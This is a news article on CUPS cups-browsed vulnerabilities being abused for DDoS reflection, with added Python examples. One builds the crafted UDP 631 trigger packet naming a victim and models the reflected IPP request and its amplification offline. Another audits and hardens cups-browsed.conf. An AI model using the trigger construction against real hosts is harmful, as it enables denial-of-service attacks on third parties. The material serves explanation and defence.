Researchers at Akamai have shown that a recently disclosed set of four vulnerabilities in CUPS (the Common Unix Printing System), already known to allow remote code execution (RCE), can also be abused to launch distributed denial of service (DDoS) attacks.
The flaws, tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, were disclosed at the end of September 2024 by researcher Simone Margaritelli, also known as evilsocket. Together they affect more than 76,000 internet-exposed devices, with some estimates putting the total number of vulnerable systems above 198,000.
The RCE chain works by adding a “ghost” printer to a vulnerable machine. The cups-browsed component listens on UDP port 631 and accepts printer announcements from any source (CVE-2024-47176), so an attacker can send one that points at a malicious Internet Printing Protocol (IPP) URL. cups-browsed then fetches the printer’s attributes from that URL, and because those attribute values are copied into a PPD file without validation (CVE-2024-47076, CVE-2024-47175), the attacker can plant a command that foomatic-rip executes when a job is printed to the fake printer (CVE-2024-47177). That last step is the catch: the attacker’s code only runs once a print job is actually started on the ghost printer.
However, Akamai’s researchers, including Larry Cashdollar, Kyle Lefton, and Chad Seaman, observed an additional risk: the same flaws can be leveraged to launch DDoS attacks. While DDoS abuse is less severe than RCE, it can still cause significant disruption.
Akamai’s findings highlight how few resources such an attack needs. An attacker can co-opt every exposed CUPS service on the internet in a matter of seconds, and on a modern hyperscaler platform the cost of sending the triggers could be less than one cent.
The trigger is a single crafted UDP packet sent to a vulnerable cups-browsed instance on port 631. The packet names the victim as the “printer” URL, and the CUPS host reacts by opening a connection to that address and sending it a larger IPP request (an HTTP POST carrying Get-Printer-Attributes). The victim absorbs the reflected traffic while the CUPS host burns its own bandwidth and CPU. Because IPP runs over TCP, the connections the victim sees originate from the CUPS hosts themselves rather than from spoofed addresses.
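The following is an added worked model of the reflection primitive just described, not code from the article or from Akamai or evilsocket. It never touches the network; it only builds the two byte strings involved so their sizes can be compared offline: the legacy CUPS browse packet that cups-browsed parses from UDP 631 (hex printer type, state, URI, optional quoted location/info/model, a format taken from cups-browsed rather than from this page), and the IPP Get-Printer-Attributes POST the CUPS host then sends to the named URI. The requested-attributes list, the acceptance of ipp/ipps/http/https schemes, and the TEST-NET address are assumptions for illustration.

```python
"""Offline model of the cups-browsed UDP trigger and the IPP request it provokes.

Added example (not from the article, Akamai, or the CUPS project). Assumptions:
  * trigger format as cups-browsed parses it:
      '<type-hex> <state> <uri> ["location" ["info" ["make-and-model"]]]'
  * the reflected request is an IPP Get-Printer-Attributes POST; the
    requested-attributes list below is illustrative, not cups-browsed's exact list.
"""
import re
import struct
from urllib.parse import urlsplit

# Mirrors cups-browsed's sscanf("%x%d%1023s") followed by optional quoted strings.
BROWSE_RE = re.compile(
    rb'^\s*([0-9a-fA-F]+)\s+(-?\d+)\s+(\S{1,1023})'
    rb'(?:\s+"([^"]*)")?(?:\s+"([^"]*)")?(?:\s+"([^"]*)")?'
)

# IPP constants from RFC 8010 / RFC 8011.
TAG_KEYWORD, TAG_URI, TAG_CHARSET, TAG_LANGUAGE = 0x44, 0x45, 0x47, 0x48
OP_GET_PRINTER_ATTRIBUTES = 0x000B
REQUESTED = ["printer-name", "printer-uri-supported", "printer-location",
             "printer-info", "printer-make-and-model", "printer-state",
             "printer-is-accepting-jobs", "ipp-versions-supported",
             "document-format-supported", "uri-security-supported"]


def build_browse_packet(target_host, target_port=631, name="p",
                        location="Location", info="Info"):
    """Trigger packet naming the victim as a printer: type 0, state 3 (idle)."""
    uri = f"ipp://{target_host}:{target_port}/printers/{name}"
    return f'0 3 {uri} "{location}" "{info}"'.encode()


def parse_browse_packet(data):
    """Decode a browse packet the way a detector would; None if it does not parse."""
    m = BROWSE_RE.match(data)
    if not m:
        return None
    dec = lambda g: None if g is None else g.decode("utf-8", "replace")
    return {"type": int(m.group(1), 16), "state": int(m.group(2)),
            "uri": dec(m.group(3)), "location": dec(m.group(4)),
            "info": dec(m.group(5)), "make_model": dec(m.group(6))}


def _attr(tag, name, values):
    """Encode one IPP attribute; additional values carry an empty name."""
    out = b""
    for i, value in enumerate(values):
        n = name.encode() if i == 0 else b""
        v = value.encode()
        out += struct.pack(">BH", tag, len(n)) + n + struct.pack(">H", len(v)) + v
    return out


def build_get_printer_attributes(printer_uri, request_id=1):
    """IPP request body: version 2.0, operation id, request id, one attribute group."""
    body = struct.pack(">BBHI", 2, 0, OP_GET_PRINTER_ATTRIBUTES, request_id)
    body += b"\x01"  # operation-attributes-tag
    body += _attr(TAG_CHARSET, "attributes-charset", ["utf-8"])
    body += _attr(TAG_LANGUAGE, "attributes-natural-language", ["en"])
    body += _attr(TAG_URI, "printer-uri", [printer_uri])
    body += _attr(TAG_KEYWORD, "requested-attributes", REQUESTED)
    return body + b"\x03"  # end-of-attributes-tag


def wrap_http_post(printer_uri, body):
    """The HTTP framing libcups puts around an IPP request."""
    u = urlsplit(printer_uri)
    head = (f"POST {u.path or '/'} HTTP/1.1\r\nHost: {u.netloc}\r\n"
            f"Content-Type: application/ipp\r\nContent-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def reflected_request(packet):
    """Bytes the CUPS host would send to the URI named in the trigger, or None."""
    p = parse_browse_packet(packet)
    if p is None or not p["uri"].startswith(("ipp://", "ipps://", "http://", "https://")):
        return None
    return wrap_http_post(p["uri"], build_get_printer_attributes(p["uri"]))


def amplification(packet, repeats=1):
    """Bytes sent toward the victim per trigger byte. repeats > 1 models a host
    that keeps re-sending the request after one trigger (beaconing)."""
    req = reflected_request(packet)
    return 0.0 if req is None else repeats * len(req) / len(packet)


if __name__ == "__main__":
    pkt = build_browse_packet("192.0.2.10", 80)  # constructed TEST-NET-1 target
    print(f"trigger {len(pkt)} B -> reflected {len(reflected_request(pkt))} B, "
          f"x{amplification(pkt):.1f} per packet")
```

Two things the numbers make visible: the printer URI from the trigger is echoed verbatim into the `printer-uri` attribute and the request line, so a longer path in the trigger inflates the reflected request, and a host that re-sends the request multiplies the ratio by the number of repeats. The parser half is the useful piece for defenders: the same regex applied to UDP 631 payloads from non-local sources is a reasonable detection signal.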
Researchers estimate that roughly 58,000 of the identified vulnerable devices could be used for DDoS attacks. Many run long-outdated CUPS releases, some as old as version 1.3 from 2007, which suggests they are unmanaged and unlikely to be patched, leaving them available to threat actors for a long time.
If every one of those hosts were co-opted into a single coordinated campaign, Akamai estimates they could generate up to 6 GB of malicious traffic. That is modest by modern DDoS standards, but still enough to disrupt a poorly provisioned target.
Akamai’s testing also revealed worrying behaviour from some live CUPS servers: after a single trigger packet they kept sending IPP requests to the target indefinitely instead of just once. For such hosts the amplification is bounded only by how long they keep retrying, which pushes the effective amplification well above the per-packet figure.
The researchers warn that even low-skilled attackers are likely to exploit these vulnerabilities, and stress that proactive work to reduce the number of vulnerable CUPS services exposed to the internet is the most effective countermeasure.
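As an added example of the kind of check that reduces exposure (not from the article or the CUPS project), the function below audits a cups-browsed configuration for the setting that opens the UDP 631 listener and produces a hardened copy. It assumes the relevant directives are `BrowseRemoteProtocols` and `BrowseProtocols` (space-separated lists in which `cups` enables the legacy browse protocol and `none` disables all), that the last occurrence wins, and, because older packages shipped with `cups` enabled, that a configuration with no directive should be treated as exposed until verified. The sample configuration is constructed.

```python
"""Audit and harden cups-browsed.conf against the UDP 631 browse listener.

Added example (not from the article or the CUPS project). Assumptions:
  * BrowseRemoteProtocols / BrowseProtocols take a space-separated list;
    'cups' turns on the legacy browse listener, 'none' turns browsing off;
  * the last directive in the file wins;
  * a file with no directive is treated as exposed (old package defaults
    included 'cups'), so the hardened copy adds an explicit 'none'.
Updating cups-browsed, libcupsfilters, libppd and cups-filters is the real
fix; this setting is a mitigation while that happens.
"""
import re

DIRECTIVE_RE = re.compile(
    r'^\s*(BrowseRemoteProtocols|BrowseProtocols)\s+([^#]*?)\s*(?:#.*)?$', re.I)
HARDENED_LINE = "BrowseRemoteProtocols none"


def audit_cups_browsed_conf(text):
    """Return (exposed, reason) for a cups-browsed.conf body."""
    protocols = None
    for line in text.splitlines():
        m = DIRECTIVE_RE.match(line)
        if m:
            protocols = m.group(2).lower().split()  # last directive wins
    if protocols is None:
        return True, "no Browse*Protocols directive; package default assumed exposed"
    if "cups" in protocols:
        return True, "legacy 'cups' browse protocol enabled: UDP 631 listener active"
    return False, f"legacy browse disabled ({' '.join(protocols) or 'none'})"


def harden_cups_browsed_conf(text):
    """Return a copy with every Browse*Protocols line replaced by 'none',
    or with 'BrowseRemoteProtocols none' appended if none was present."""
    out, replaced = [], False
    for line in text.splitlines():
        if DIRECTIVE_RE.match(line):
            out.append(HARDENED_LINE)
            replaced = True
        else:
            out.append(line)
    if not replaced:
        out.append(HARDENED_LINE)
    return "\n".join(out) + "\n"


# Constructed sample in the shape of a stock cups-browsed.conf.
SAMPLE_CONF = """# Which protocols to use to discover remote printers
BrowseRemoteProtocols dnssd cups   # package default on older releases
BrowseLocalProtocols none
"""

if __name__ == "__main__":
    print(audit_cups_browsed_conf(SAMPLE_CONF))
    fixed = harden_cups_browsed_conf(SAMPLE_CONF)
    print(fixed)
    print(audit_cups_browsed_conf(fixed))
```

Pair this with a listener check on the host (`ss -ulnp | grep ':631'` should show nothing once cups-browsed is stopped) and, where printer discovery is not needed at all, simply disable the service with `systemctl disable --now cups-browsed`; blocking inbound UDP 631 at the perimeter covers hosts you cannot reconfigure immediately.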
APIContext CEO Mayur Upadhyaya likened the CUPS vulnerability to an amplifier in a speaker system, illustrating how small signals can be transformed into overwhelming amounts of traffic, effectively drowning targeted systems in a flood of malicious requests.